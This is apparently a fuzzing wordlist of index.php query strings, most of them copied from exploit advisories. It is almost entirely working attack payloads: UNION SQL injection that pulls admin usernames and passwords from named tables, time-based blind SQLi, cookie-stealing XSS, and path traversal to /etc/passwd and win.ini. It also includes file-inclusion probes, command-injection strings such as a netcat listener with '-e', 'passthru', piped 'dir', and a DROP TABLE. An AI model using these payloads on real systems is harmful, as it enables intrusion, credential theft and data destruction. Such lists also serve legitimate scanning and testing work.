index.php?p=affichedecision&id=-669 union select 1,2,3,4,5,6,load_file('
index.php?page=
index.php?page=..
index.php?page='<
index.php?page=[]
index.php?page[]
index.php?page=%00"><script>alert(document.cookie)<
index.php?page=1
index.php?page=1 ] ..
index.php?page=1-02-1
index.php?page=1322&lang=eng&cnt=services
index.php?page=1322[SQLi]&lang=eng&cnt=services
index.php?page=15
index.php?page=1 and 1=1
index.php?page=1 and 1=2
index.php?page=1&section="><script>alert(111);<
index.php?page=-1+union+all+select+1,2,concat(@@version,0x3a,database(),0x3a,user()),4,5,6
index.php?page=-1+union+select+1,2,3,4,5,concat(table_name,char(58),column_name)+from+information_schema.columns
index.php?page=-1+union+select+1,2,3,4,5,concat_ws(char(58),version(),user(),now())
index.php?page[]=2
index.php?page=20&orderlinks=+and+1=0+union+select+name,null,null,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wsnguest_members--
index.php?page=%22%3E%3Cscript%3Ealert(document.domain);%3C
index.php?page=%27
index.php?page=-28+union+select+concat_ws(0x3a,admin,password)+from+admin
index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2fwin.ini%00
index.php?page=3'
index.php?page=4&action=file&file_id=405
index.php?page=4&action=file&file_id=71
index.php?page=8" method="post">
index.php?page=a
index.php?page=account_add
index.php?pageaction=results&campaign_id=[SQL] 
index.php?page=add                   +
index.php?page=add&loggedin=true
index.php?page=add_package
index.php?page=addtocart&id=-170
index.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
index.php?page=adminlogin
index.php?page=admin_users&action=new">
index.php?page="><alert(document.cookie);<
index.php?page=a&name=cP
index.php?page=AnnounceShow&catID=1'");
index.php?page=AnnounceShow&catID=".$annid."
index.php?page=arcadempro.php
index.php?page=area.php&domain=3%27
index.php?page=articles&article=-1%20union%20select%201,pseudo_admin,3,motdepasse_admin,5,6,7,8,9,10,11,12,13,14,15,16,17,email_admin%20from%20[table prefix]_admins--
index.php?page=articles&article=-1%20union%20select%201,pseudo_admin,3,motdepasse_admin,5,6,7,8,9,10,11,12,13,14,15,16,17,email_admin%20from%20zblog_admins--
index.php?page=[attackeR Code]                 #
index.php?page=background
index.php?page=brewBlogList&style="><script>alert(document.cookie)<
index.php?page=browse&action=list&group=0&cat=-1
index.php?page=browse&action=list&group=0&cat=[SQLI]&orderby=DESCRIPTION
index.php?page=browse&category=[LFI]%00
index.php?page=browse&id=1' AND SLEEP(0) AND
index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20[table prefix]_admins--
index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20zblog_admins--
index.php?page=categories
index.php?page=category&cat_id=-9999+union+all+select+1,concat(user,char(58),passw ,char(58),email),3,null,null,null,7,8,9,10,11,null +from+users--
index.php?page=category&PageSection=0&catid=[SQL]
index.php?page=connexion  ( login )
index.php?page=customer&action=show";
index.php?page=DBpAGE&pageid=-1%27+union+select+null,concat(version(),0x3a,database(),0x3a,user())
index.php?page=DBpAGE&pageid=-1'+union+select+null,concat(version(),0x3a,database(),0x3a,user())
index.php?Page=definition&UID=2;Drop Table Docs; -- 
index.php?Page=definition&UID=2;[SQLINJECTION]
index.php?page=demo
index.php?page=detail&id=[SQL]
index.php?page=detail&id=ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null
index.php?page=details&prod=[SQLI]&cat=0&group=0
index.php?page=documents&doc=-99%27 UNION SELECT null,null,username,password, null,null,null,null,null,null,null,null FROM dcp5_members WHERE username=%27[username]
index.php?page=download
index.php?Page=Download
index.php?page=downloads
index.php?page=downloads&id=45&action=down&catid=1
index.php?page=downloads&menuid=9
index.php?page=downloads&request=download_now&downloads_id=' UNION SELECT email_address as name, NULL, NULL, password as file_name, last_name as file_url from admin_users where id!='NULL
index.php?page=download&what=download&fid=12      #
index.php?page=e
index.php?page=edit_page&id="><script>alert(1)<
index.php?page=employees:main&page_title=View%20Employees
index.php?page=en_Home&car=110+and+substring(version(),1,1)=4   => False
index.php?page=en_Home&car=110+and+substring(version(),1,1)=5   => True
index.php?page=en_Home&car=[Blind SQL Injection] 
index.php?page=en_Home&car=[SQL] 
index.php?page=en_Orders&OrderNumber=258'+
index.php?page=EProjects&sub=editRFC&rfcId=[SQLi]&projectId=18
index.php?page=EProjects&sub=viewProject&projectId=18
index.php?page=error&error=<b>...<
index.php?page=error&error=<script>alert(1)<
index.php?page=[EVIL_CODE]
index.php?page=evilcode?&cmd=id
index.php?page=[EV!L]
index.php?page=faq&subsection=viewfaq&faq_id=[sql]
index.php?page=forums&f=1
index.php?page=general\r\n";
index.php?page=getapp&id=10
index.php?page=home&order=&orderby=&rowstart=[sql]
index.php?pageid='
index.php?pageid=1"
index.php?pageid=13&#9001;=en
index.php?page_id=-1+and+1=0+Union+Select+[VISIBLE],2,3,4
index.php?pageid=1+and+1=1 ( TRUE  )
index.php?pageid=1+and+1=2 ( FALSE )
index.php?pageid=1+and+substring(@@version,1,1)=3 ( TRUE  )
index.php?pageid=1+and+substring(@@version,1,1)=4 ( FALSE )
index.php?pageid=1+and+substring(@@version,1,1)=5 ( FALSE )
index.php?page_id=-1&news_id=-1
index.php?page_id=-1&news_id=1 >>>> false
index.php?page_id=-1&news_id=1 >>>> true
index.php?pageid=216
index.php?pageid=218
index.php?page_id=293&print_view=y%20and%20substring%28@@version,1,1%29=4  << This True
index.php?page_id=293&print_view=y%20and%20substring%28@@version,1,1%29=5  << This Faulse 
index.php?pageid=2&categoryid=-1
index.php?pageid=50+and+substring(@@version,1,1)=3
index.php?pageid=50+and+substring(@@version,1,1)=4
index.php?pageid=50+and+substring(@@version,1,1)=5
index.php?page=$id&cmd=ls%20-la");
index.php?pageid=ext&ext=login&extpage=registrate" method="post" name="main" >
index.php?page_id=prod&brandid=248+and+1=0+Union+Select+[VISIBLE],2,3,4
index.php?page_id=prod&brandid=248&brand_name=LUKE 1977&plu=0001246502+and+1=0+Union+Select+[VISIBLE],2,3,4
index.php?pageid=[SQLi]&#9001;=[SQLi]
"."index.php?page=invalid.php");
index.php?page= [lfi]
index.php?page=[-LFI-]                           #
index.php?page=[LFI]
index.php?page=[LFI]%00
index.php?page=links&catid=1&lcat=-99%27 UNION SELECT null,password FROM dcp5_members WHERE username=%27[username]
index.php?page=listStory&cat=[code] 
index.php?page=listStory&cat=Programs+and+Services&subcat=[code]
index.php?page=login&request=forgot_password&include=..
index.php?page=login_submit -> POST-Parameter 'username_input=[sql-injection]'
index.php?page=mail
index.php?page=mdetails&uid=-99%27 UNION SELECT null,null,null,username,null, null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null FROM dcp5_members WHERE username=%27[username]
index.php?page=media&id=-99999+union+select+0,1,2,4,5,6,7,8,9,user_name,11,password,13,14,15,16,17,18,19,20,21+from+deeemm_users                                #
index.php?page=media`+union+select+0,1,2,4,5,6,7,8,9,user_name,11,password,13,14,15,16,17,18,19,20,21+from+deeemm_users
index.php?page=mythings&cat=downloads&action=edit&id=null union all select 1,2,3,4,concat_ws(0x3a,uname,passwd),6,7,8,9,10,11 from cms_users--
index.php?page=news&subsection=viewcomments&news_id=[sql]
index.php?page=new_topic&index=1&id=union
index.php?page=null+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,
index.php?page=opensource
index.php?page=order.order_status_form&limitstart=0&keyword=&order_status_id=-1%27+UNION+ALL+SELECT+1,username,password,@@version,database%28%29,6+FROM+jos_users%23&option=com_virtuemart
index.php?page=order.order_status_form&limitstart=0&keyword=&order_status_id=[SQL]&option=com_virtuemart
index.php?page=pack_linux
index.php?page=?page=..
index.php?page=?page=[LFI]
index.php?page=pages
index.php?page=pages&show=1&id=3
index.php?page=pages&show=1&id=6
index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat%28uname,0x3a,passwd%29,3,4,5+from+sn_users--
index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat(uname,0x3a,passwd),3,4,5+from+sn_users--
index.php?page=photos&album=[N.A.S.T ]
index.php?page=Photos&sub=search (Field:
index.php?page=Photos&sub=search&pattern="><script>alert(String.fromCharCode(88,83,83))<
index.php?page=Photos&sub=uploadPic (Field: "Title")
index.php?page=[PHPCode]
index.php?page=PM&action=delete&pmID=[ID]&folderID=0[
index.php?page=pp_productos.php&tbusq=9&codf=17&md=1&codm=-1+UNION+SELECT+1,2--
index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
index.php?page=prod-ppim) is a Personal
index.php?page=profile&id=' or 'a'='a
index.php?page=profile&pid=-1
index.php?page=record1
index.php?page=RGalleryUserGallery&userID='");
index.php?page=RGalleryUserGallery&userID=".$galid."
index.php?page=<script>alert(document.cookie)<
index.php?page=<script>alert(document.cookie);<
index.php?page="><script>alert(document.cookie)<
index.php?page=Search&category=[BlindSQL]
index.php?page=search&menuid=5
index.php?page=search&search=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&author_id=&author=&startdate=&enddate=&pf=1&topic=
index.php?page=search&start=1&keyword=ion=
index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[1923Turk]=1)+union+select+1,2,3,4,concat_ws(0x0A,name,password,email),6,7,8,9+from+novaboard_members+--+
index.php?PageSection=0&page=browse&go=-1%20union%20select%20all%20concat(0x3a,version(),0x3a,user(),0x3a,0x3a,database()),2%20from%20mysql.user
index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=4  > false
index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=5  > true
index.php?PageSection=0&page=individual&table=edp_pupublish&read=<script>alert(document.cookie);<
index.php?PageSection=7&page=individual&table=edp_Help_Internal_News&read=1+union+all+select+1,2,3,4,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),6+from+edp_puusers
index.php?PageSection=x&page=browse&go=<sql>
index.php?page=send&sendmessage=1
index.php?page=setcard&id=-618+union+select+1,2,3,4,5,version%28%29,7,8,9,10,11,12--+
index.php?page=settings
index.php?page=settings_administrator">
index.php?page=sezione&id=-1+union+select+1,concat(strUser,0x3a,strPass)+from+login
index.php?page=shell
index.php?page=[SHELL]                           #
index.php?page=shipping.carrier_list&
index.php?page=shop.browse
index.php?page=shop.debug&option=com_virtuemart
index.php?page=shop.feed&option=com_virtuemart
index.php?page=shop.pdf_output
index.php?page=shop.product_details&flypage=shop.flypage&product_id=24&option=com_virtuemart
index.php?page=shop.product_details&flypage=shop.flypage&product_id=6995+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat(username,0x3a,password,0x3a,gid,0x3a,id)Gabriel,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+from+jos_users+limit+1,1--&category_id=10&manufacturer_id=11&option=com_virtuemart&Itemid=1&vmcchk=1&Itemid=1
index.php?page=shop.product_details&flypage=shop.flypage&product_id=[SOA injection]
index.php?page=shop.product_details&flypage=shop.flypage&product_id=[SOA injection] 
index.php?page=show_article&articleid=-1+union+select+concat_ws(0x3a3a,user_login,user_pass,user_email),2,3,4,5+from+wp_users
index.php?page=showlisting&lid=<SCRIPT%20SRC=evilsite.com
index.php?Page=ShowPicture&Id=-756+union+select+1,2,3,4,5,6,@@version,current_user,database(),10+from+admins
index.php?page=sign_in
index.php?page=[SQL]
index.php?page=[sqli]
index.php?page=[sql injection]
index.php?page=[SQL Injection]
index.php?page=sql_login
index.php?page=TagIndex&tags=${passthru('dir')}
index.php?page=tasks&action=preferences
index.php?page=tasks&action=preferences" % rhost)
index.php?page=telechargement-2 \
index.php?page=tellafriend
index.php?page=test'test
index.php?page='" this should cause a mysql error and you will be able to
index.php?page=thread&post=444709648
index.php?page=tool_db_backup&action=delete&id=..
index.php?page=topic&topic_id=9999
index.php?page='&total=2
index.php?pageurl=[injection URL]
index.php?pageurl=viewpage&
index.php?page=usercp&control=1&avatar=1&main=1
index.php?page=users
index.php?page=users_modif&action=modif&user=null union all select concat_ws(0x3a,login,pass),2 from yap_user where id=1--
index.php?page=users&sub=deleteMessage&messageId=[SQLi]
index.php?page=users&sub=extendUserProfile (Field:
index.php?page=users&sub=newMessage&messageId=[SQLi]
index.php?page=users&sub=readMessage&msgId=[SQLi]
index.php?page=vhdwebpack
index.php?page=view&id=511 <== [ SQL ]
index.php?page=view&id=-511+UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8+from+parapara_copp1.jos_users
index.php?page=weblog&env=..
index.php?page=weblog&env=[Local File]%00
index.php?page=wp-ids
index.php?pagina=
index.php?pagina=[file]
index.php?pagina=news&id=-5+union+select+1,group_concat%28concat%28username,0x3a,password,0x3a,email%29%20separator%200x3c62723e%29,3,4,5,6,7,8,9,10+from+utenti--
index.php?pagina=news&id=[SQL Injection]
index.php?pag=scripts&lang=en      
index.php?params=profile
index.php?p=articles&area=[SQL Code] 
index.php?_path=..
index.php?path=
index.php?path=..
index.php?path=..\anything
index.php?path_faqe=[INDONESIANCODER]
index.php?path=&op=del&name=cmd.php"
index.php?path=&op=newitem
index.php?path=&op=status&name=cmd.php&newstatus=1"
index.php?PathPrefix=..
index.php?PathPrefix=ftp:
index.php?_path="><script>alert(document.cookie)<
index.php?path=<script>alert(document.domain)<
index.php?pa=viewannonces&lid=-1946' union select 1,2,3,4,version(),6,7,8,9,0,1,2,3,4,5,6,7
index.php?pa=viewannonces&lid=-41' union select 1,2,3,4,version(),6,7,8,9,0,1,2,3,4,5,6,7
index.php?pa=viewannonces&lid=[SQLi]
index.php?pa=view&cid=[exploit]
index.php?p=catalog&parent=12&pg="><script>alert(document.domain);<
index.php?p=catalog&parent=[SQLI]
index.php?p=cfg&m=links
index.php?p=cfg&m=links&id=0" method="post">
index.php?p=download&mode=cat&id=2
index.php?p=edit_ticket' AND SLEEP(5) AND
index.php?pfad=
index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20
index.php?pg=1&d=..
index.php?pg=admin&s=..
index.php?pg=cmd
index.php?pge=dload
index.php?p=getcat&db_id=[SQL] 
index.php?pg=[EV!L]
index.php?pg=forum
index.php?pg=[LFI]
index.php?pg=&L=[variable-injection]&H=[variable-injection]
index.php?pg=modules
index.php?pg=scripts&CODE=06&id=-10%20union%20select%20name,name,name%20from%20pc_admins
index.php?pg=scripts&CODE=06&id=-10%20union%20select%20name,pass,name%20from%20pc_admins
index.php?pg=scripts&CODE=06&id='[SQL]
index.php?pg=Sh3ll?
index.php?pg=shell link?
index.php?photo_id=-1
index.php?phpbb_root_path=[evil_scripts]
index.php?phpincdir=[Shell URL]?
index.php?&PHPSESSID='
index.php?PHPSESSID=270ca5a0f7c1e5b2fd4c
index.php?PHPSESSID=376bd47985f6c37b06ceb727b0879287&module=Downloads;sa=dlview;id=7
index.php?PHPSESSID=BugReportIRSessionFixation
index.php?pid=-1%20union%20select%201,concat(id,0x3a,user,0x3a,password,0x3a,access,0x3a,email),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2%20from%20admin--&user=det
index.php?pid=77
index.php?PID="><script>alert("test")<
index.php?pid=[SQLi]
index.php?pilih=..
index.php?pilih=contak&mod=yes
index.php?pilih=dl&mod=yes&aksi=lihat&kategori=&kid=-9'[SQLI]
index.php?pilih=links&mod=yes&aksi=lihat&kategori=&kid=-9'[SQLI]
index.php?p=info&id='3
index.php?p=info&id='3'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--Cumi++
index.php?pingto=www.test.com%20|%20dir
index.php?plantilla=busqueda&txt_filtro=<font size=15 color=green>CoBRa_21<
index.php?plantilla=contenido_lista&ncategoria1=[SQL Injection]
index.php?p=[Lfi]%00
index.php?p=[ LFI ]%00
index.php?p=[LFI]%00
index.php?plugin_id=28&p_id=[sqli]
index.php?plugin_id=4
index.php?plugin=staticpages";
index.php?plugin=tasks&action=search
index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><script>alert(document.cookie)<
index.php?poll_action=vote" method="post">
index.php?poll=[SQL]
index.php? popup=comment&showimage=1
index.php", port:port));
index.php?post=..
index.php (POST
index.php?post_category_id=1+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user
index.php", post, hdrs)
index.php?post_id=1+union+select+1,concat(login_id,char(58),password),3,4,5,6,7,8+from+bloo_user
index.php?post_year_month=[NumberIdOfExistentPost]+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user
index.php?p=productsList&sWord=%22%3E%3Cscript%3Ealert(document.cookie)%3C
index.php?prefix=[evil_script]
index.php?prefix=[file] 
index.php?p=register&v=1' OR IF(ASCII(CHAR(97)) = 97,BENCHMARK(10000000000,null),null)%23
index.php?p=register&v=-1' UNION ALL SELECT GROUP_CONCAT(uname,0x3a,passwd),2 FROM users%23
index.php?print=download&page=Photos&sub=loadAndShowPhoto&picId=[SQLi]
index.php?product=_513' (Sql)
index.php?ProductID=&BuyerID=
index.php?productID='[SQL inj] 
index.php?profile=1&form_id=2'
index.php?PROMETHEUS_LIBRARY_BASE=
index.php?proMod=%22%3E%3Cscript%3Ealert(document.cookie)%3C
index.php?proMod=index&amp%3bftoedit=..%2fshopincs%2fmaintopENG 
index.php?pseudo=><script>alert(navigator.appVersion)<
index.php?pshop_mode=admin&
index.php?p=showdl&dl=16&cat=18
index.php?p='[SQL code]
index.php?p=[SQLi]&id=211&_=1334627588812
index.php?p=submit
index.php?puntal_path=[inj3ct0r sh3ll]
index.php?p=viewprofile&uid=1'+union+select+1,uname,3,upwd,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+psc_users+where+uid=1+limit+1,1
index.php?pymembs=admin 
index.php?q=3' and 1=2 union select 1,2,3
index.php?q=[Local File]%00
index.php?qry=x
index.php?q="<script>alert(
index.php?q='[SQL code] 
index.php?query=%3Cscript%3Ealert(document.cookie)%3C
index.php?query=asd&blogid=1,1)+union+select+1,2,user(),database(),mname,6,7,8,9,10,11,mpassword,13,14,15+from+nucleus_member
index.php?query=t4mugel4p')[SQLI]&pilih=search
index.php?rang=5'
index.php?read=..
index.php?read=arbitary_file
index.php?readold=999%20union%20select%201,password,3,4,name,6%20from%20Users
index.php?referer=[SQL Injection]
index.php?referrer=9999999999'%20UNION%20SELECT%20password,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,
index.php?regusername=a&regpassword=a&regnickname=a&regemail=a%40a.com&reglevel=1&action=adduser&mod=editusers
index.php?regusername=a&regpassword=a&regnickname=a&regemail=a%40a.com&reglevel=1&action=adduser&mod=editusers">
index.php?relPath=..
index.php?rep=..
index.php?req=blog_edit&id=1[SQL]
index.php?req=blog_edit&id=-1 union select 1,2,adm_pass,4,5,6 from rate_admins where adm_id=1
index.php?req=blog_edit&id=-1 union select 1,2,adm_user,4,5,6 from rate_admins where adm_id=1
index.php?req=blog_edit&id=-1 union select 1,2,version(),4,5,6
index.php?req=edit&id=999999 And 1=0 UNION SELECT
index.php?req=login&redirect=&login_message=<script>alert()<
index.php?req=online&show=1[SQL]
index.php?req_path=http :
index.php?request=event&action=video&eids=1&videoFormat=1&rate=1&scale=1&id=1" -p id --level 3 --risk 3 --technique T --dump
index.php?_REQUEST[read]=[EV!L]
index.php?req=update_payment&id=-4410+union+all+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44--
index.php?req=update_payment&id= EV!L INJECT!ON 
index.php?req=view&user=somegirl&id=2&act=vote&image=3[SQL]&voter=12&vote=3
index.php?req=view&user=somegirl&id=2[SQL]&act=vote&image=3&voter=12&vote=3
index.php" %rhost)
index.php?r=i
index.php?rlist=true&details=..
index.php?r=member&v1=member_list" method="post" name="main" >
index.php?r=member&v1=view&v2=123%27%20union%20select%201,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%201
index.php?r=membre&v1=member_list
index.php?r=membro&v1=member_list
index.php?rmid=[directory traversal]
index.php\r\n";
index.php?r=news&v1=123%27%20union%20select%201,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15,16,17%20--%201
index.php?root_dir=[your command]
index.php?rootid="><iframe>
index.php?rootpath=[Shell]
index.php?route=..
index.php?route[]
index.php?route=account
index.php?route=..\..\admin\index
index.php?route=common
index.php?route=download
index.php?route=product
index.php?r=&page_id=-74+union+select+1,1,1,convert(concat_ws(0x2F2A2A2F,version(),current_user,database())+using+latin1),1,1--
index.php?rubid=1+union+select+1,@@version,3--
index.php?rubric=Download
index.php?s=..
index.php?s=-10+union+select+version()--
index.php?s=123%27
index.php?s=-182+union+select+version(),2--
index.php?s=3+and+1=0+union+all+select+1,2,3,4,5--
index.php?s=4X0r' UNION SELECT NULL,VERSION(),NULL,NULL,NULL,NULL -- '
index.php?s=-6+union+select+1,2,3,4,5--
index.php?s=&act=chat&pop=1;'><script>alert('this could be your cookie')<
index.php?s=ad&id=4
index.php?s=ad&id=6
index.php?s=ad&id=7
index.php?sbcat_id=6+and+substring(version(),1,1)=4  << false
index.php?sbcat_id=6+and+substring(version(),1,1)=5  << true
index.php?sbcat_id=[Blind SQLi]
index.php?sbjoke_id=-1+union+select+0,1,2,3,concat_ws(sbadmin_pwd,0x3a,sbadmin_name),5,6,7,8,9,10+from+sbjks_admin--
index.php?sbjoke_id=-5592+union+all+select+1,2,3,4,concat(sbadmin_name,0x3a,sbadmin_pwd),6,7,8,9,10,11,12,13+from+sbjks_admin--
index.php?s=cat&m=o&id=[IndonesianCoder-2009]
index.php?screen=..
index.php?screen=eflower
index.php?<script>alert(1)<
index.php?>"'><ScRiPt>alert(213771818860)<
index.php?<script>alert(document.cookie);<
index.php?script=Downstat
index.php?Sdb_type=[RFI]
index.php?search=%
index.php?search";
index.php?search='>%3Cscript%3Ealert%28%27owned%27%29%3Blocation.href%3D%27http%3A%2F%2Fwww.example.com%27%3B%3C%2Fscript%3E&dir=&searchMode= 
index.php?searchdays[]
index.php?search=[html]
index.php?SEARCH_KEYS=&CATEGORY_ID=[SQL] 
index.php?search=NoGe&option=com_esearch&searchId=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users--
index.php?search=NoGe&option=com_esearch&searchId=[SQLi]
index.php?search=<script>alert(document.cookie);<
index.php?search=[sqli]
index.php?searchStr=%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat&Submit=Go
index.php?searchtext=%'%20OR%20LOWER(b.bookid)%20LIKE%20'%a%'%20OR%20LOWER(b.isbn)%20LIKE%20'%a%'%20OR%20LOWER(b.title)%20L
index.php?searchword=";phpinfo();%23&option=com_search&Itemid=1
index.php?sec=estado&sec2=operation
index.php?sec=project&sec2=downloads&lang=en
index.php?sec=project&sec2=home&lang=en)
[INDEX].[PHP]?sec=services&sec2=[FILE INCLUDE VULNERABILITY!]
index.php?section=4&page=3" method="post" name="main" >
index.php?section=ftp:
index.php?section=[html]
index.php?section=login
index.php?section=pictures&action=open&PictureId=[SQL Injection]
index.php?section=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)
index.php?section=[sqli]
index.php?section=user&action=login
index.php?sec=usuarios&sec2=operation
index.php?seite=17&aid=
index.php?seite=17&aid=111111111+union+select
index.php?seite=17&aid=[SQLi]
index.php?seite=2.down&action=klick&id=1\"";
index.php?seite=2.gaestebuch\"";
index.php?seite=download
index.php?selskin=..%2F..%2F..%2F..%2F.%2Fetc%2Fpasswd%00
index.php?selskin=..%2Finc%2Fboxleft.inc%00&xposbox[L][]=http:%2F%2Fhost%2Fshell?
index.php?selskin=..%2Finc%2Fboxleft.inc%00&xposbox[L][]=[RFI]
index.php?selskin=[LFI]%00
index.php?sensor_program=lmsensors.inc.php
index.php?server=1&port=<script>var%20sub_variable=11233;alert(sub_variable);<
index.php?_SERVER[ConfigFile]=..
index.php?_SERVER[DOCUMENT_ROOT]=
index.php?_SERVER[HTTP_ACCEPT_LANGUAGE]=..
index.php?serverid=2+union+select+0,1,concat(username,0x3a,password),3+from+stats_users--
index.php?serverid=6+union+select+0,1,concat(username,0x3a,password),3+from+stats_users--
index.php?_SERVER[SCRIPT_NAME]="><script>alert(document.cookie)<
index.php?service=5&id=-4375+UNION+SELECT+1,2,3,concat(user,0x3a,passwd),5+from+wa_admin--
index.php?service=5&id=4375+UNION+SELECT+1,2,3,concat(user,0x3a,passwd),5+from+wa_admin--
index.php?service=5&id=[SQL Injection]
index.php?session=VALIDSESSION&menu=admin&func=admin&do=blog_edit1&blog="><script>alert(0)<
index.php?session=VALIDSESSION&menu=admin&func=admin&do=cat_edit&cat="><script>alert(0)<
index.php?session=VALIDSESSION&menu=admin&func=admin&do=editcommuser&edituser=VALIDUSERHASH
index.php?session=VALIDSESSION&menu=admin&func=admin&do=edituser&edituser=<
index.php?session=VALIDSESSION&menu=admin&func=admin&do=templates&edit=<script>alert(0)<
index.php?session=VALIDSESSION&menu=entries&doaction=1
index.php?session=VALIDSESSION&menu=entries&doaction=1&action=delete&check['><script>alert(0)<
index.php?session=VALIDSESSION&menu=entries&doaction=1&action=delete&check[]='><script>alert(0)<
index.php?session=VALIDSESSION&menu=entries&sort="><script>alert(0)<
index.php?setFilter=11232
index.php?setLang=suntzu&lang[suntzu][file]=..
index.php?setLang=suntzu&lang[suntzu][file]=%3Cscript%3Ealert(document.cookie)%3C
index.php?s[]=FPD
index.php?sfx=
index.php?shard=
index.php?shme=-63 UNION ALL SELECT
index.php?show=
index.php?show=..
index.php?show=%3C
index.php?show=-7%20union%20select%201,load_file(hex directory
index.php?show=-7%20union%20select%201,user(),3,4,5--
index.php?show=-7%20union%20select%201,version(),3,4,5--
index.php?show=add&PID=
index.php?show_board=99999+union+select+0,0,0,0,0,0,0,0,0,concat(admin_name,0x3a,admin_pass),0,0,0,0,0,0,0+from+tbl_admin
index.php?show=c2w_news%2Ephp&cat=news_archiv
index.php?show=cat&id=1' AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0) AND id='1
index.php?show=cat&id=1' AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0) AND id='1"
index.php?show=comments&action=add
index.php?show=comments&action=post
index.php?show_emp=1%20and%20substring(@@version,1,1)=4 [NO°°]
index.php?show_emp=1%20and%20substring(@@version,1,1)=5 [y&$] 
index.php?show_emp=[sql] 
index.php?show=[file]&cat=news_archiv&start=1 
index.php?showforum=2\n";
index.php?showlinks=1&viewmode=0&gallery_id=[SQLi]
index.php?shownews='
index.php?shownews=2'+UNION+SELECT+1,2,username,4,pwd,6,7,8,9,10,11,12+FROM+table
index.php?shownews=999999'+union+select+1,2,3,
index.php?shownews=[SQL+SUBQUERY]
index.php?show=product&id=[sqli]
index.php?show_records=1&filter_on=1&qry=repeat
index.php?show=showarticles&file=..
index.php?show=showarticles&file=[local-file]
index.php?show=[SQL] 
index.php?showtopic=1&st='><script>alert(document.cookie)<
index.php?showtopic=208510&pid=1366158&st=-1[sql]&#entry1366158
index.php?showtopic=39691.
index.php?showtopic='><script>window.open
index.php?showtopic=[SQL]
index.php?sid=a284c075e8b0073935ba7290ca0dade8&act=newpm&mid=-99%20UNION%20SELECT%20password%20FROM%20tb_members%20WHERE%20user_id=1 
index.php?sid=cc3de2fc8c2b357b6a6d46ea8aa92a32&act=profile&mid=-99%20UNION%20SELECT%20null,password,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20tb_members%20WHERE%20user_id=1
index.php?sid=CDFE279AC2AD08522DF1CF9B46475132&lang=%22%3E%3Cscript%3Ealert(docum ent.cookie)%3C
index.php?sid=CDFE279AC2AD08522DF1CF9B46475132&lang='SQL_INJECTION
index.php?side=..
index.php?SID=[SQL]
index.php?sine[config][index_main]=
index.php?sine[config][index_main]=..
index.php?site=..
index.php?site=-1'+union+select+1,2,concat_ws(0x3a,passwort,email),4,5+from+members+limit+1,1
index.php?site=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
index.php (site=admin) 
index.php?site=admin&action=files
index.php?site=admin&action=sites
index.php?site=[Alias]
index.php?site=%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
index.php?sitecode=..
index.php?site=demo					     |
index.php?site=demos&bn=..
index.php?site=[EvilScript]
index.php?site=files&file=15
